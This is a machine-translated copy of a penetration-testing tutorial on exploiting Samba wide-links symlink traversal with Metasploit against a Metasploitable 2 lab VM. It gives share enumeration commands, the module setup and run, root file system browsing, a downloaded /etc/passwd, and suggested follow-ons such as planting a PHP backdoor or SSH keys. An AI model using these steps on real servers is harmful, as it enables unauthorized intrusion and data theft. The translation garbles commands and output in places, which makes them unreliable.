قالب وردپرس درنا توس
Home / Tips and Tricks / How to Get Root File System Access Through Samba Symlink Traversal «Null Byte :: WonderHowTo

How to Get Root File System Access Through Samba Symlink Traversal «Null Byte :: WonderHowTo



Samba can be configured to allow anyone with write access to connect to the root file system. Once an attacker has this level of access, it is only a matter of time before the system gains possession. Although this configuration is not so common in nature, Metasploit can easily exploit this vulnerability.

Symbolic links or symlinks are files that point to other files or directories on a system. and they are an integral part of the Linux environment. Symlinks are often used to connect libraries and redirect specific binaries to other versions.

File-sharing systems such as Samba can use symbolic links to give users easy access to linked folders and files. However, these joins are usually limited to the share itself, which prevents access to the underlying file system.

Samba has the option to use wide links. These are basically symbolic links that may be linked outside the sandbox file share. This is obviously a major security issue as any user with write access to a share can connect to the root file system.

For this demonstration, we use Kali Linux to attack a virtual machine with Metasploitable 2. If you have a similar pentesting lab, you can read along.

Step 1
: Create Link to Metasploit

After we have determined that the SMB service is running on the target, we must first check if we can access the shares and, if so, their Find names. We can use smbclient for this:

  ~ # smbclient -L //10.10.0.50/

Enter the WORKGROUP  root password:
Anonymous login successful

Share name Type Comment
--------- ---- -------
Print the $ disk printer driver
tmp disk oh no!
opt disc
IPC $ IPC IPC Service (Samba 3.0.20 Debian Server)
ADMIN $ IPC IPC Service (metasploitable server (Samba 3.0.20 Debian))
Reconnect to SMB1 to list the workgroups.
Anonymous login successful

server comment
--------- -------

Workgroup Master
--------- -------
WORKGROUP METASPLOITABLE 

You can see above that we can log in anonymously and list the shares. It looks like there are some standard releases, but the one that looks interesting is called tmp . There is even a suspicious comment that we use as a target release.

Then start Metasploit by typing msfconsole in the terminal.

  ~ # msfconsole

[-] *** The Metasploit Framework Console ... /
[-] * WARNING: No database support: No database YAML file
[-]

, ,
,

dBBBBBBb dBBBP dBBBBBP dBBBBb. O
& # 39; dB & # 39; BBP
dB & # 39; dB & # 39; dB & # 39; dBBP dBP dBP BB
dB # dB # dBP dBP dBP BB
dB # dB # dB # dBBBBP dBP dBBBBBB

dBBBBBP dBBBBBb dBP dBBBP dBP dBBBBBP
, , dB & # 39; dBP dB & # 39; .BP
| dBP dBBBB & # 39; dBP dB & # 39; .BP dBP dBP
- -o- dBP dBP dBP dB & # 39; .BP dBP dBP
| dBBBBP dBP dBBBBP dBBBP dBP dBP

,
,
o Brave to go where no
Shell has gone before

= [ metasploit v5.0.20-dev                          ]
+ - - = [ 1886 exploits - 1065 auxiliary - 328 post       ]
+ - - = [ 546 payloads - 44 encoders - 10 nops            ]
+ - - = [ 2 evasion                                       ]

msf5> 

Recommended Reading: Metasploit Penetration Testing Cookbook, Third Edition

Once we are in the signup banner and it welcomes, we can search for a suitable module that uses for the search can] command:

  msf5> search samba symlink

Matching modules
================

# Name Disclosure Date Rank Check Description
- ---- ---------------- ---- ----- -----------
0 additional / admin / smb / samba_symlink_traversal normal No Samba Symlink Directory Traversal
1 additional / dos / samba / lsa_addprivs_heap normal No Samba lsa_io_privilege_set Heap Overflow
2 additional / dos / samba / lsa_transnames_heap normal No Samba lsa_io_trans_names Heap Overflow
3 additional / dos / samba / read_nttrans_ea_list normal No Samba read_nttrans_ea_list Integer Overflow
4 additional / scanner / rsync / modules_list normal Yes List of Rsync modules
5 additional / scanner / smb / smb_uninit_cred normal Yes Samba _netr_ServerPasswordSet Uninitialized permission state
6 additional / server / wget_symlink_file_write 10/27/2014 normal No GNU Wget FTP Symlink Arbitrary Filesystem Access
7 Exploit / freebsd / samba / trans2open 2003-04-07 Excellent No Samba-Trans2open overflow (* BSD x86)
8 exploit / linux / local / abrt_raceabrt_priv_esc 2015-04-14 excellent Yes ABRT raceabrt rights extension
9 exploit / linux / local / asan_suid_executable_priv_esc 2016-02-17 excellent Yes AddressSanitizer (ASan) SUID Executable Privilege Escalation
10 exploit / linux / samba / chain_reply Jun 16, 2010 Good No Samba chain_reply memory corruption (Linux x86)
11 exploit / linux / samba / is_known_pipename 2017-03-24 excellent Yes Samba is_known_pipename () Load any module
12 exploit / linux / samba / lsa_transnames_heap 2007-05-14 good Yes Samba lsa_io_trans_names Heap Overflow
13 exploit / linux / samba / setinfopolicy_heap 2012-04-10 normal Yes Samba SetInformationPolicy AuditEventsInfo Heap Overflow
14 Exploit / Linux / Samba / Trans2open 2003-04-07 Excellent No Samba-Trans2open overflow (Linux x86)
15 exploit / multi / samba / nttrans 2003-04-07 average No Samba 2.2.2 - 2.2.6 nttrans Buffer Overflow
16 exploit / multi / samba / usermap_script 2007-05-14 excellent No Samba command "username map script"
17 Exploit / osx / samba / lsa_transnames_heap 2007-05-14 Average No Samba lsa_io_trans_names Heap Overflow
18 Exploit / osx / samba / trans2open 07.04.2003 No Samba Trans2open overflow (Mac OS X PPC)
19 exploit / solaris / samba / lsa_transnames_heap 2007-05-14 average No samba lsa_io_trans_names heap overflow
20 Exploit / Solaris / Samba / Trans2open 07.04.2003 No Samba-Trans2open overflow (Solaris SPARC)
21 exploit / unix / http / quest_kace_systems_management_rce 2018-05-31 excellent Yes Quest KACE Systems Management Command Injection
22 exploit / unix / misc / distcc_exec 2002-02-01 excellent Yes Run the DistCC daemon command
23 exploit / unix / webapp / citrix_access_gateway_exec 12/21/2010 excellent Yes Citrix Access Gateway command execution
24 exploit / windows / fileformat / ms14_060_sandworm 2014-10-14 excellent No MS14-060 Microsoft Windows OLE Package Manager code execution
25 exploit / windows / http / sambar6_search_results 21.06.2003 normal Yes Sambar 6 Search Results Buffer Overflow
26 Exploit / windows / license / calicclnt_getconfig 2005-03-02 Average No Computer Associates License Client GETCONFIG Overflow
27 exploit / windows / local / ms13_097_ie_registry_symlink Dec 10, 2013 great No MS13-097 Registry Symlink IE Sandbox Escape
28 exploit / windows / smb / group_policy_startup 2015-01-26 manual No execution of Group Policy scripts from shared resources
29 post / linux / gather / enum_configs normal No Linux Gather Configurations 

We have received many results from this search term, but the one we want to use is actually the first one. Load the module with the command use followed by the path of the module:

  msf5> use additional / admin / smb / samba_symlink_traversal 

Now that we are loaded into the context of the module, use the command options can be used to display the settings:

  msf5 additional (admin / smb / samba_symlink_traversal)> options

Module Options (Help / admin / smb / samba_symlink_traversal):

Name Current setting Required Description
---- --------------- -------- -----------
RHOSTS yes The destination address range or the CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBSHARE yes The name of a writable share on the server
SMBTARGET rootfs yes The name of the directory to point to the root file system. 

It looks like port 445 is already set as the correct port for SMB, as well as the name of the directory that is being created and which is linked to the root file system. We have to set the option RHOSTS as the IP address of the target:

  msf5 auxiliary (admin / smb / samba_symlink_traversal)> set rhosts 10.10.0.50

rhosts => 10.10.0.50 

And the name of the share that we want to write, in this case the share tmp :

  msf5 additional (admin / smb / samba_symlink_traversal)> set smbshare tmp

smbshare => tmp 

Now we should all be set and just enter the following: run at the command prompt to start the module:

  msf5 auxiliary (admin / smb / samba_symlink_traversal)> run

[*] Current module against 10.10.0.50

[*] 10.10.0.50:445 - connection to server is established ...
[*] 10.10.0.50:445 - Attempt to write writable release & # 39; tmp & # 39; to mount ...
[*] 10.10.0.50:445 - Attempting to & # 39; rootfs & # 39; to associate with the root file system ...
[*] 10.10.0.50:445 - Now access the following share to search the root file system:
[*] 10.10.0.50:445 - \ 10.10.0.50  tmp  rootfs 

[*] Supplement Module Completion 

It specifies what it does during execution – it first connects to the server and provides the specified writable share. It then creates a link to the root file system and specifies where to access it. Perfect.

Step 2: Accessing the Root File System

Once the module does its job, we can stop Metasploit with the command exit and use smbclient to connect to the target SMB share create: [19659008] msf5> exit
~ # smbclient //10.10.0.50/tmp

Enter the WORKGROUP root password:
Anonymous login successful
Try "Help" for a list of possible commands.
smb: >

We can log in anonymously again and use the command ls to see the contents of the share:

  smb: > ls

, D 0 Wed Aug 8 10:52:28 2018
.. DR 0 Sun May 20 13:36:12 2012
4600.jsvc_up R 0 Wed Aug 8 08:57:48 2018
.ICE-unix DH 0 Wed Aug 8 08:56:05 2018
.X11-unix DH 0 Wed Aug 8 08:56:51 2018
.X0-lock HR 11 Wed Aug 8 08:56:51 2018
rootfs DR 0 Sun May 20 13:36:12 2012

7282168 blocks of size 1024. 5430648 blocks available 

Apparently, there is a new directory created with the Metasploit module here. This is a link that we can enter like a normal directory. Let's do that and see what's inside:

  smb: > cd rootfs 
smb:  rootfs > ls

, DR 0 Sun 20 May 13:36:12 2012
.. DR 0 Sun May 20 13:36:12 2012
initrd DR 0 Tue Mar 16 17:57:40 2010
Media DR 0 Tue Mar 16 17:55:52 2010
am DR 0 Sun May 13 22:35:33 2012
lost + found DR 0 Tue Mar 16 17:55:15 2010
Monday, April 28, 3:16:56 pm, DR 0, Wed., 2010
sbin DR 0 Sun 13 May 20:54:53 2012
initrd.img R 7929183 Sun May 13 22:35:56 2012
home DR 0 Fri Apr 16 01:16:02 2010
lib DR 0 Sun 13 May 22:35:22 2012
usr DR 0 Tue Apr 27 23:06:37 2010
proc DR 0 Wed Aug 8 08:55:30 2018
root DR 0 Wed Aug 8 08:56:51 2018
sys DR 0 Wed Aug 8 08:55:31 2018
boat DR 0 Sun 13 May 22:36:28 2012
nohup.out R 20962 Wed Aug 8 08:56:51 2018
etc DR 0 Wed Aug 8 08:56:23 2018
dev DR 0 Wed Aug 8 08:56:06 2018
vmlinuz R 1987288 Thu Apr 10 11:55:41 2008
opt DR 0 Tue Mar 16 17:57:39 2010
var DR 0 Wed Mar 17 09:08:23 2010
CD-ROM DR 0 Tue Mar 16 17:55:51 2010
tmp D 0 Wed Aug 8 10:52:28 2018
srv DR 0 Tue Mar 16 17:57:38 2010

7282168 blocks of size 1024. 5430648 blocks available 

And there we have it – root file system access. We can now do things like view / etc / passwd though we can not do that directly. Just go to the directory / etc / and download the file to our computer with the command get :

  smb:  rootfs > cd etc
get smb:  rootfs  etc > passwd

Retrieving the file  rootfs  etc  passwd with the size 1581 as passwd (128.7 kilobytes / sec.) (Average 128.7 kilobytes / sec.) 

Now we can see all users available on the target, their home directories and Show the available shells. all useful information for the education:

  ~ # cat passwd

root: x: 0: 0: root: / root: / bin / bash
Daemon: x: 1: 1: daemon: / usr / sbin: / bin / sh
bin: x: 2: 2: bin: / bin: / bin / sh
sys: x: 3: 3: sys: / dev: / bin / sh
sync: x: 4: 65534: sync: / bin: / bin / sync
Games: x: 5: 60: Games: / usr / Games: / bin / sh
man: x: 6: 12: man: / var / cache / man: / bin / sh
lp: x: 7: 7: lp: / var / spool / lpd: / bin / sh
mail: x: 8: 8: mail: / var / mail: / bin / sh
news: x: 9: 9: news: / var / spool / news: / bin / sh
uucp: x: 10: 10: uucp: / var / spool / uucp: / bin / sh
Proxy: x: 13: 13: Proxy: / bin: / bin / sh
www-data: x: 33: 33: www-data: / var / www: / bin / sh
backup: x: 34: 34: backup: / var / backups: / bin / sh
list: x: 38: 38: mailing list manager: / var / list: / bin / sh
irc: x: 39: 39: ircd: / var / run / ircd: / bin / sh
gnats: x: 41: 41: midges bug reporting system (admin): / var / lib / gnats: / bin / sh
nobody: x: 65534: 65534: nobody: / ​​nonexistent: / bin / sh
libuuid: x: 100: 101 :: / var / lib / libuuid: / bin / sh
dhcp: x: 101: 102 :: / absent: / bin / false
syslog: x: 102: 103 :: / home / syslog: / bin / false
klog: x: 103: 104 :: / home / klog: / bin / false
sshd: x: 104: 65534 :: / var / run / sshd: / usr / sbin / nologin
msfadmin: x: 1000: 1000: msfdmin ,,,: / home / msfadmin: / bin / bash
bind: x: 105: 113 :: / var / cache / bind: / bin / false
postfix: x: 106: 115 :: / var / spool / postfix: / bin / false
ftp: x: 107: 65534 :: / home / ftp: / bin / false
postgres: x: 108: 117: PostgreSQL administrator ,,,: / var / lib / postgresql: / bin / bash
mysql: x: 109: 118: mysql server ,,,: / var / lib / mysql: / bin / false
tomcat55: x: 110: 65534 :: / usr / share / tomcat5.5: / bin / false
distccd: x: 111: 65534 :: /: / bin / false
user: x: 1001: 1001: only one user, 111 ,,: / home / user: / bin / bash
service: x: 1002: 1002: ,,,: / home / service: / bin / bash
telnetd: x: 112: 120 :: / not available: / bin / false
proftpd: x: 113: 65534 :: / var / run / proftpd: / bin / false
statd: x: 114: 65534 :: / var / lib / nfs: / bin / false 

Other Attack Scenarios

Now that we have access to the root file system, an attacker can go several ways. It all depends on the attacker's imagination and the configuration of the target.

There is an important caveat here: Although we have root access to the file system, we have no root privileges. We only have the permissions associated with anonymous login to the tmp share (usually normal user rights). This limits the possible actions. However, depending on the configuration of the server, we can try a few things.

For example, because we have write access, we can place a PHP backdoor in the Apache Web root directory, and navigate in the browser to launch a shell for our local machine. Another attack vector, if the permissions on the SSH configuration file are insufficient, is to add it to the authorized key file so that we can include SSH in the box.

As a hacker, it's imperative to be creative, even in situations where it seems impossible to access the shell. With enough patience and creativity, this can be done.

Summary

Today we learned how to exploit broad links in Samba to access the root file system. After checking that we have access to an SMB share, we used a Metasploit module to create a link pointing to the root directory on the server. We were then able to see the root file system and examine some possible attack vectors. The ability to use a simple misconfiguration to exploit the system should be the goal of any white-hat hacker.

Cover image of Pixabay / Pexels; Screenshots of drd_ / zero byte

Source link